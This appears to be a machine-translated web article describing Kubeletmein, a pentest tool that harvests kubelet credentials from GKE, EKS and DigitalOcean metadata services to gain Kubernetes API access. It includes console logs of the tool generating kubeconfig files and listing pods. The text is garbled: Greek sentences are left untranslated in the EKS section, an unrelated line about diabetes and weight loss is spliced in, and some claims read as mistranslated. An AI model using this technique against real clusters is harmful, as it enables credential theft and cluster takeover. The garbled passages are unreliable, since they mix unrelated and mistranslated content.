Kubeletmein is a simple pentest tool that exploits cloud threats to a cluster of Kubernetes to gain access to the k8s API.
This access can be used to further control applications running in the cloud or in many other cases, facilitating complete control of Kubernetes.
Supported providers and use
G.K.E.
GKE (Google Kubernetes Engine) is fully supported and relies on disabling all hidden metadata.
EKS
Η support για το Amazon Elastic Kubernetes Service προστέθηκε αρχικά από τον @airman604 με base This makes it a perfect choice for people with diabetes and for those who want to lose weight or follow a balanced diet. startup script AWS EKS. This was extended to provide support για διάφορους τύπους δεδομένων του χρήστη, που συναντώνται στο EKS.
Specifically, it will support cloud-config and shell script formats. In the latter case, the program tries to parse the /etc/eks/bootstrap.sh command line arguments and retrieve the values needed from there.
~ $ kubeletmein generate 2021-03-02T21:37:59Z [ℹ] running autodetect 2021-03-02T21:37:59Z [ℹ] EKS detected 2021-03-02T21:37:59Z [ℹ] fetching cluster information from user-data from the metadata service 2021-03-02T21:37:59Z [ℹ] getting IMDSv2 token 2021-03-02T21:37:59Z [ℹ] getting user-data 2021-03-02T21:37:59Z [ ℹ ] generating EKS node kubeconfig file at: kubeconfig 2021-03-02T21:37:59Z [ℹ ] wrote kubeconfig 2021-03-02T21:37:59Z [ℹ ] then try: kubectl --kubeconfig kubeconfig get pods
Digital Ocean
Supported by default, DO provides metadata credits and this cannot be disabled.
root @ kubeletmein-vulnerable: / # kubeletmein generate 2021-03-04T23: 39: 46Z [ℹ] running autodetect 2021-03-04T23: 39: 46Z [ℹ] DigitalOcean detected 2021-03-04T23: 39: 46Z [ℹ] fetching kubelet creds from metadata service 2021-03-04T23: 39: 46Z [ℹ] writing ca cert to: ca-CERTIFICATES.crt 2021-03-04T23:39:46Z [ℹ] generating bootstrap-kubeconfig file at: bootstrap-kubeconfig 2021-03-04T23:39:46Z [ℹ] wrote bootstrap-kubeconfig 2021-03-04T23:39:46Z [ℹ] using bootstrap-config to request new cert for node: kubeletmein-node 2021-03-04T23:39:46Z [ℹ] got new cert and wrote kubeconfig 2021-03-04T23:39:46Z [ℹ] now try: kubectl --kubeconfig kubeconfig get pods root@ kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get pods NAME READY STATUS RESTARTS AGE kubeletmein-vulnerable 1/1 Running 0 6m12s
You can download the program from here.